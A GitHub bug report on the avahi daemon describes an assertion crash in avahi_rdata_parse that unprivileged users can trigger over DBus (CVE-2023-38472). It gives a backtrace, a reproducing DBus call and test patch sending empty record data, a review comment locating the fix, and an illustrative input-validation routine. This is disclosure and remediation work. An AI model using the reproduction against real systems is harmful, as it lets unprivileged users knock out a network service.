
Reachable assertion in avahi_rdata_parse #452

Closed
evverx opened this issue Apr 25, 2023 · 1 comment · Fixed by #490
Labels: bug, important, High priority

Comments

@evverx (Member) commented Apr 25, 2023

dns.c:861: int avahi_rdata_parse(AvahiRecord *, const void *, size_t): Assertion `rdata' failed.
(gdb) bt
#0  0x00007ffff788ec0c in __pthread_kill_implementation () from /lib64/libc.so.6
#1  0x00007ffff783e986 in raise () from /lib64/libc.so.6
#2  0x00007ffff78287f4 in abort () from /lib64/libc.so.6
#3  0x00007ffff782871b in __assert_fail_base.cold () from /lib64/libc.so.6
#4  0x00007ffff7837536 in __assert_fail () from /lib64/libc.so.6
#5  0x00007ffff7eb1b68 in avahi_rdata_parse (record=0x6040000241d0, rdata=<optimized out>, size=<optimized out>) at dns.c:861
#6  0x000000000055837c in avahi_dbus_msg_entry_group_impl (c=0x612000001fc0, m=<optimized out>, userdata=<optimized out>) at dbus-entry-group.c:343
#7  0x00007ffff7cf3d11 in dbus_connection_dispatch () from /lib64/libdbus-1.so.3
#8  0x0000000000561f76 in dispatch_timeout_callback (t=t@entry=0x606000001dc0, userdata=0x603000002110) at ../avahi-common/dbus-watch-glue.c:105
#9  0x00007ffff7fa1c80 in timeout_callback (t=t@entry=0x606000001dc0) at simple-watch.c:447
#10 0x00007ffff7fa0d37 in avahi_simple_poll_dispatch (s=s@entry=0x60e000000120) at simple-watch.c:567
#11 0x00007ffff7fa1e7d in avahi_simple_poll_iterate (s=0x60e000000120, timeout=timeout@entry=-1) at simple-watch.c:605
#12 0x000000000051e503 in run_server (c=<optimized out>) at main.c:1268
#13 0x0000000000517bdf in main (argc=<optimized out>, argv=<optimized out>) at main.c:1686

It can be reproduced by calling something like

org.freedesktop.Avahi /Client*/EntryGroup* org.freedesktop.Avahi.EntryGroup AddRecord "iiusqquay" 0 0 0 '' 0 0 0 0

using

avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Test", 0x01, 0x10, 120, "", 0)

from inside a client creating EntryGroups. It can be triggered by unprivileged users unless disable-user-service-publishing is set to yes explicitly. By default it's set to no.

The easiest way to reproduce it would be to apply the following patch to client-test.c:

diff --git a/avahi-client/client-test.c b/avahi-client/client-test.c
index b3366d8..907c8be 100644
--- a/avahi-client/client-test.c
+++ b/avahi-client/client-test.c
@@ -256,7 +256,7 @@ int main (AVAHI_GCC_UNUSED int argc, AVAHI_GCC_UNUSED char *argv[]) {
     printf("Successfully created entry group %p\n", (void*) group);

     printf("%s\n", avahi_strerror(avahi_entry_group_add_service (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Lathiat's Site", "_http._tcp", NULL, NULL, 80, "foo=bar", NULL)));
-    printf("add_record: %d\n", avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "\5booya", 6));
+    printf("add_record: %d\n", avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "", 0));

     avahi_entry_group_commit (group);
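Review bot: the changed call passes a non-NULL "" with size 0, yet the assertion that fires in the backtrace is `rdata' at dns.c:861, so the pointer that reaches avahi_rdata_parse from dbus-entry-group.c:343 is NULL; the empty array is turned into a NULL pointer somewhere between this client call and the daemon's handler, and a client-side guard on size == 0 would not close the hole, because the busctl-style AddRecord call shown above reaches the same path without the client library at all. The check belongs in the daemon's DBus handler: reject NULL or zero-length rdata with an error reply before calling avahi_rdata_parse. Minor style point: the add_service line above prints its result through avahi_strerror while this line prints the raw int; printing both the same way makes the test output easier to read.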

build it, run avahi and then run the test.

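As an added example, not part of this issue and not avahi's code: the front-door validation a handler such as AddRecord needs before handing caller-supplied rdata to a parser that assert()s on its preconditions. It rejects the two shapes the reproduction above sends (a NULL pointer, and a non-NULL pointer with size 0) and walks the length-prefixed strings of a TXT payload such as the "\5booya" the original client-test.c line passes. It assumes the 0x01/0x10 arguments in that call are class IN and type TXT in RFC 1035 numbering; the function names, error codes and per-type rules are invented for illustration and say nothing about how #490 fixed the daemon.

```c
/* Added example, not avahi's code: validate resource-record rdata coming
 * from an untrusted IPC caller before it reaches a parser that aborts on
 * bad preconditions. Names and error codes below are assumptions. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define DNS_CLASS_IN 0x01   /* RFC 1035 class IN */
#define DNS_TYPE_A   0x01   /* RFC 1035 type A   */
#define DNS_TYPE_TXT 0x10   /* RFC 1035 type TXT */
#define RDATA_MAX    0xFFFF /* RDLENGTH is a 16-bit field (RFC 1035 s.3.2.1) */

/* Hypothetical error codes for this example. */
enum {
    RDATA_OK            =  0,
    RDATA_ERR_NULL      = -1,  /* the case that trips assert(rdata) in dns.c:861 */
    RDATA_ERR_EMPTY     = -2,  /* non-NULL pointer, size 0 ("" with size 0) */
    RDATA_ERR_TOO_LONG  = -3,
    RDATA_ERR_MALFORMED = -4
};

/* Walk the <length><bytes> strings of a TXT rdata (RFC 1035 s.3.3.14).
 * Returns the number of strings (>= 1) or a negative error. */
static int validate_txt(const uint8_t *p, size_t size) {
    size_t i = 0;
    int n = 0;
    if (size == 0)
        return RDATA_ERR_EMPTY;            /* TXT must carry at least one string */
    while (i < size) {
        size_t len = p[i];                 /* length byte of the next string */
        if (i + 1 + len > size)
            return RDATA_ERR_MALFORMED;    /* string runs past the buffer */
        i += 1 + len;
        n++;
    }
    return n;
}

/* What the IPC handler should do before calling the real parser.
 * Returns RDATA_OK or one of the negative codes above. */
int validate_rdata(uint16_t clazz, uint16_t type, const void *rdata, size_t size) {
    const uint8_t *p = (const uint8_t *)rdata;
    if (!p)
        return RDATA_ERR_NULL;
    if (size == 0)
        return RDATA_ERR_EMPTY;
    if (size > RDATA_MAX)
        return RDATA_ERR_TOO_LONG;
    if (clazz != DNS_CLASS_IN)
        return RDATA_OK;                   /* only IN types are modelled here */
    switch (type) {
    case DNS_TYPE_A:
        return size == 4 ? RDATA_OK : RDATA_ERR_MALFORMED;  /* exactly one IPv4 address */
    case DNS_TYPE_TXT: {
        int n = validate_txt(p, size);
        return n < 0 ? n : RDATA_OK;
    }
    default:
        return RDATA_OK;                   /* unknown types: opaque but non-empty */
    }
}

int main(void) {
    /* Constructed inputs mirroring the reproduction and the original test line. */
    printf("NULL,0      -> %d\n", validate_rdata(DNS_CLASS_IN, DNS_TYPE_TXT, NULL, 0));
    printf("\"\",0        -> %d\n", validate_rdata(DNS_CLASS_IN, DNS_TYPE_TXT, "", 0));
    printf("\\5booya,6   -> %d\n", validate_rdata(DNS_CLASS_IN, DNS_TYPE_TXT, "\5booya", 6));
    printf("\\011ab,3    -> %d\n", validate_rdata(DNS_CLASS_IN, DNS_TYPE_TXT, "\011ab", 3));
    return 0;
}
```

The ordering matters: the NULL and size checks run before anything type-specific, so a caller that bypasses the client library and speaks DBus directly gets an error reply instead of taking the daemon down.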
@carnil commented Oct 5, 2023

CVE-2023-38472 is assigned for this issue.
